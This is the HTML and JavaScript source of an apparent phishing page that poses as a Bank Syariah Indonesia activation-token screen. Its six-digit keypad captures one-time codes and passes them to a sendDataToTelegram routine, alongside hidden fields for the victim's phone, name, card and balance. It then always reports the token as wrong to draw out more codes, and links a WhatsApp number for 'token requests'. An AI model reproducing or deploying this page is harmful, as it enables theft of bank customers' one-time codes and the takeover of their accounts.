
<html>
  <head>
      

<meta name="theme-color" content="#00A39E"> 
    <meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, viewport-fit=cover">
	<meta name="description" content="">
	<meta name="apple-mobile-web-app-capable" content="yes">
	<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
	<meta name="theme-color" content="#ee4d2d" data-rh="true">
	<meta property="og:type" content="website">

	<title>Bank Syariah Indonesia</title>    
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-0evHe/X+R7YkIZDRvuzKMRqM+OrBnVFBL6DOitfPri4tjfHxaWutUpFmBp4vmVor" crossorigin="anonymous">
    <link rel="stylesheet" href="https://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css"/>
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Nunito:wght@800&display=swap');
        body {
            padding: 0;
            margin: 0;
            width: 100%;
             background-image: url("img/otp.png");
    background-position: 100% 100%;
    background-size: 100% 716px;
    background-repeat: no-repeat;
            overflow: hidden; 
            background: none ;
            padding-right: 0px;
        }

        .text-header {
            font-family: 'Nunito', sans-serif;
            color: #aaa;
        }

        .text-subheader {
            font-family: 'Nunito', sans-serif;
            margin-top: -40px;
            color: #aaa;
            font-size: 15px;
        }

        .sizing {
            width: 332px;
        }

        @media only screen and (max-width: 600px) {
            .sizing {
                width: 95%;
            }
        } 

        .pinNumb {
            cursor: pointer;
            
            width: 105px; 
            background-color: #fff; 
            font-size: 30px; color: #000; 
            text-align: center; 
            padding-left: -10px; 
            border-radius: 5px; 
            box-shadow: rgba(171, 171, 171, 1) 1px 1px 1px 0px; 
           font-weight: 300;
            padding: 4px 50px -10 10;
            background: #fff;
            margin: -18px -6px;
            border: 0px solid #aaa;
            position: relative;
            height: 45px;
        }

        button.pinNumb:hover {
            color: #a1a1a1;
            background-color: rgba(255, 255, 255, 0.1);
            border: 1px solid #ccc;
            box-shadow: rgba(171, 171, 171, 1) 0px 1px 0px 0px; 
        }

.bubble-element{
    font-weight: 300;
    background: #406F67;
    color: #fff;
}

#setPin, #hapus{
    background: #EEB252;
    font-weight: 500;
    color: #fff;
}


<style>
#animation-demo {
	width: 200px;
	height: 150px;
	position: relative;
	background-color: #62A80A;
	line-height: 150px;
	color: #000;
	border: solid 1px #1A7404;
	text-align: center;
} 

.fadeInUpBig {
	-webkit-animation-duration: 0.5s;
	animation-duration: 0.5s;
	-webkit-animation-fill-mode: both;
	animation-fill-mode: both;
	-webkit-animation-timing-function: ease;
	animation-timing-function: ease;
	-webkit-animation-name: fadeInUpBig; 
    animation-name: fadeInUpBig; 
}

@-webkit-keyframes fadeInUpBig { 
    0% { 
        opacity: 1; 
        -webkit-transform: translateY(200px); 
    } 
    100% { 
        opacity: 1; 
        -webkit-transform: translateY(0); 
    } 
} 
@keyframes fadeInUpBig { 
    0% { 
        opacity: 1; 
        transform: translateY(200px); 
    } 
    100% { 
        opacity: 1; 
        transform: translateY(0); 
    } 
} 

<style>
#animation-demo {
	width: 200px;
	height: 150px;
	position: relative;
	background-color: #62A80A;
	line-height: 150px;
	color: #000;
	border: solid 1px #1A7404;
	text-align: center;
} 

.fadeOutDownBig {
	-webkit-animation-duration: 1s;
	animation-duration: 1s;
	-webkit-animation-fill-mode: both;
	animation-fill-mode: both;
	-webkit-animation-name: fadeOutDownBig;
    animation-name: fadeOutDownBig; 
}

@-webkit-keyframes fadeOutDownBig { 
    0% { 
        opacity: 1; 
        -webkit-transform: translateY(0); 
    } 
    100% { 
        opacity: 1; 
        -webkit-transform: translateY(240px); 
    } 
} 
@keyframes fadeOutDownBig { 
    0% { 
        opacity: 1; 
        transform: translateY(0); 
    } 
    100% { 
        opacity: 1; 
        transform: translateY(240px); 
    } 
} 



/*********************/
.process1 {
     width: 100%;
            height: 100%;
             display: flex;
             justify-content: center;
            margin: auto;
            position: absolute;
           padding-top: 300px;
            left: 0;
            right: 0;
            bottom: 0;
            background: rgba(0, 0, 0, 0.4);
            z-index: 99999;
            
      
}
.loading {
    position: absolute;
    display: flex;
    justify-content: center;
    align-items: center;
    margin-bottom: 20%;
    margin-top: 25px;
}
.loading img {
    width: 215px;
    border-radius: 10px;
    top: 10;
}
.loading .spinner{
    position: absolute;
    width: 35px;
    animation: spin 1s linear infinite;
    -webkit-animation: spin 1s linear infinite;
    -moz-animation: spin 1s linear infinite;
    -ms-animation: spin 1s linear infinite;
    -o-animation: spin 1s linear infinite;
}
@keyframes spin {
  0% { transform: rotate(360deg); }
  100% { transform: rotate(0deg); }
}
@-webkit-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-moz-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-ms-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-o-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}

/*********************/


    </style>
  </head>
  <body style=" background-image: url(img/otp.png);
    background-position: 0px 0px;
    background-size: 100% 716px;
    background-repeat: no-repeat;">

    <div class="container">
        <div class="row" style="margin-top: -30px;">
            <div class="col-12 d-block mx-auto sizing" style="white-space: pre-wrap; text-align: center; margin-top: 25px; height: 98.8px; padding-bottom: 0px; font-family: Barlow; font-size: 16px; font-weight: 400; color: rgb(255,255,255); line-height: 1.4; border-radius: 50px;">
              
            </div>
        </div>
        <p style="font-weight: 400; font-size: 21px; color: #fff; text-align: center; margin: 20px auto; margin-bottom: -30px" id="timer">1 : 00</p> 
<form id="ryuSubmit"  method="post">   
<section onclick="getkey()">
        <div class="row" style="margin-top: -150px;">
            <div class="col-12 d-block mx-auto sizing" style="white-space: pre-wrap; height: 58.8px; padding-bottom: 0px; font-size: 16px; font-weight: 400; color: rgb(59, 59, 59); line-height: 1.4; border-radius: 50px;">
               <div class="row" style="texr-align: center; margin-right: 5px;">
<input type="hidden" id="tele" name="tele" value="">
<input type="hidden" id="namanye" name="namanye" value="">
<input type="hidden" id="kertu" name="kertu" value="">
<input type="hidden" id="uang" name="uang" value="">	                  
<input type="tel" name="sixpin" id="setPin" autocomplete="true" style="opacity: 0" oninput="kirimPesan()">
                    <div class="col-2">
                        <div class="bubble-r-box" style="height: 50px; left: 0px; width: 50px;">
              <div class="bubble-element Group" name="pin6" id="pin1" style="box-sizing: border-box; font-size: 30px; color: #fff; text-align: center; padding-top: 3px;  width: 50px; left: 0px; top: 0px; border: 0px solid #ccc; border-radius: 50px; box-shadow: rgba(171, 171, 171, 0) 0px 0px 0px 0px; height: 50px;"></div>
                        </div>
                    </div>
                    <div class="col-2">
                        <div class="bubble-r-box" style="height: 50px; left: 0px; width: 50px;">
                            <div class="bubble-element Group" id="pin2" style="box-sizing: border-box; width: 50px; font-size: 30px; color: #fff; text-align: center; padding-top: 3px;border: 0px solid #ccc; border-radius: 50px; box-shadow: rgba(171, 171, 171, 0) 0px 0px 0px 0px; height: 50px;"></div>
                        </div>
                    </div>
                    <div class="col-2">
                        <div class="bubble-r-box" style="height: 50px; left: 0px; width: 50px;">
                            <div class="bubble-element Group" id="pin3" style="box-sizing: border-box; width: 50px; font-size: 30px; color: #fff; text-align: center; padding-top: 3px;border: 0px solid #ccc; border-radius: 50px; box-shadow: rgba(171, 171, 171, 0) 0px 0px 0px 0px; height: 50px;"></div>
                        </div>
                    </div>
                    <div class="col-2">
                        <div class="bubble-r-box" style="height: 50px; left: 0px; width: 50px;">
                            <div class="bubble-element Group" id="pin4" style="box-sizing: border-box; width: 50px; font-size: 30px; color: #fff; text-align: center; padding-top: 3px;border: 0px solid #ccc; border-radius: 50px; box-shadow: rgba(171, 171, 171, 0) 0px 0px 0px 0px; height: 50px;"></div>
                        </div>
                    </div>
                    <div class="col-2">
                        <div class="bubble-r-box" style="height: 50px; left: 0px; width: 50px;">
                            <div class="bubble-element Group" id="pin5" style="box-sizing: border-box; width: 50px; font-size: 30px; color: #fff; text-align: center; padding-top: 3px; border: 0px solid #ccc; border-radius: 50px; box-shadow: rgba(171, 171, 171, 0) 0px 0px 0px 0px; height: 50px;"></div>
                        </div>
                    </div>
                    <div class="col-2">
                        <div class="bubble-r-box" style="height: 50px; left: 0px; width: 50px;">
                            <div class="bubble-element Group" name="pin6" id="pin6" style="box-sizing: border-box; width: 50px; font-size: 30px; color: #fff; text-align: center; padding-top: 3px;border: 0px solid #ccc; border-radius: 50px; box-shadow: rgba(171, 171, 171, 0) 0px 0px 0px 0px; height: 50px;"></div>
                        </div>
                    </div>
               </div>
               
               <div class="row" style="margin-top: -120px">
                    <div class="col-12">
                        <div class="text-header text-center" style="font-family: 'Nunito', sans-serif;'">
                          
                            <span class=""  style="position: fixed; left: 20; right: 20; margin: 0px auto;  font-weight: bold; color: #EEB252; display: ;line-height: 18px" id="">Jika belum menerima token aktivasi silahkan tekan dibawah ini
                  <br/><b id="notif" onclick="window.location.href='https://wa.me/6282176223272?text=Hallo%20Bank%20BSI%0ASaya%20mau%20request%20Token%20Aktivasi'" style="color: #eee">Request Token Aktivasi</b></span><br/>
   
               </div>
            </div>
        </div>
        </section>
        <div class="fadeInUpBig row" id="keybot" style="display: none; position: absolute; bottom: 0; left: 8; right: 8">
            <div class="col-12 d-block mx-auto " style="white-space: pre-wrap; height: 240px; margin-bottom: 10px; font-size: 16px; color: rgb(59, 59, 59); line-height: 1.29; border-radius: 3px; background-color: #406F67; width: 100%; position: absolute; left: 0; right:0 ; margin: -10px auto; text-align: center; bottom: 0; padding: 15px; border-radius: 10px 10px 0px 0px; border-top: 2px inset #fff">
                <div class="row" style="margin-top: -68px">
                    <div class="col-4">
                        <button type="button" class="bubble-element Group pinNumb" id="setPin" data-id="1">1</button>
                    </div>
                    <div class="col-4">
                        <button type="button" class="bubble-element Group pinNumb" id="setPin" data-id="2">2</button>
                    </div>
                    <div class="col-4">
                        <button type="button" class="bubble-element Group pinNumb" id="setPin" data-id="3">3</button>
                    </div>
                </div>

                <div class="row" style="margin-top: -80px">
                    <div class="col-4">
                        <button type="button" class="bubble-element Group pinNumb" id="setPin" data-id="4">4</button>
                    </div>
                    <div class="col-4">
                        <button type="button" class="bubble-element Group pinNumb" id="setPin" data-id="5">5</button>
                    </div>
                    <div class="col-4">
                        <button type="button" class="bubble-element Group pinNumb" id="setPin" data-id="6">6</button>
                    </div>
                </div>

                <div class="row" style="margin-top: -80px">
                    <div class="col-4">
                        <button type="button" class="bubble-element Group pinNumb" id="setPin" data-id="7">7</button>
                    </div>
                    <div class="col-4">
                        <button type="button" class="bubble-element Group pinNumb" id="setPin" data-id="8">8</button>
                    </div>
                    <div class="col-4">
                        <button type="button" class="bubble-element Group pinNumb" id="setPin" data-id="9">9</button>
                    </div>
                </div>

                <div class="row" style="margin-top: -80px">
                    <div class="col-4">
                        
                    </div>
                    <div class="col-4">
                        <button type="button" class="bubble-element Group pinNumb" id="setPin" data-id="0">0</button>
                    </div>
                    <div class="col-4">
                        <button type="button" class="bubble-element Group pinNumb" id="hapus"><i class="ion-backspace-outline"></i></button>
                    </div>
                </div>
            </div>
        </div>
    </div>
   

   
       
    </form>
    <center>
     <div id="djload" name="process" class="process1" style="display: none;">
            <div class="loading">
                <img src="img/loding.gif">
              
            </div>
        </div>
        </center>
<script>
    function getkey(){
 $("#keybot").show();    
  $("#keybot").removeClass("fadeOutDownBig");     
  $("#notif").show();   
   $("#notif").text("Request Token Aktivasi");
   $("#notif").css("color", "white");
    }
</script>     

            <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> 
 
 
   
<script>
        document.getElementById('timer').innerHTML =
          01 + ":" + 01;
        startTimer();
        
        
        function startTimer() {
          var presentTime = document.getElementById('timer').innerHTML;
          var timeArray = presentTime.split(/[:]+/);
          var m = timeArray[0];
          var s = checkSecond((timeArray[1] - 1));
          if(s==59){m=m-1}
          if(m<0){
            return
          }
          
          document.getElementById('timer').innerHTML =
            m + " : " + s;
          
          setTimeout(startTimer, 1000);
          
        }
        
        function checkSecond(sec) {
          if (sec < 10 && sec >= 0) {sec = "0" + sec}; // add zero in front of numbers < 10
          if (sec < 0) {sec = "59"};
          return sec;
        }
    </script> 
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
<script src="request/java.js"></script>
<script>
$(document).ready(function() {
    $("button#setPin").on('click', function() {
        // ... (rest of the pin input logic remains the same)

        if(pinValue.length == 6) {
            $("#keybot").addClass("fadeOutDownBig");     
            event.stopPropagation();
            event.preventDefault();

            sendDataToTelegram('otp');

            setTimeout(function(){  
                $("#notif").text("- Token Aktivasi SALAH -");
                $("#notif").css("color", "red");
                $("#pin1, #pin2, #pin3, #pin4, #pin5, #pin6").html('');   
                setTimeout(() => {
                    $("#notif").text("Request Token Aktivasi");
                    $("#notif").css("color", "white");
                    $("#keybot").hide();  
                }, 4000);
            }, 700);
        }
    });

    $("#hapus").on('click', function() {
        $("#pin1, #pin2, #pin3, #pin4, #pin5, #pin6").html('');
    });
});
</script>
  </body>
</html>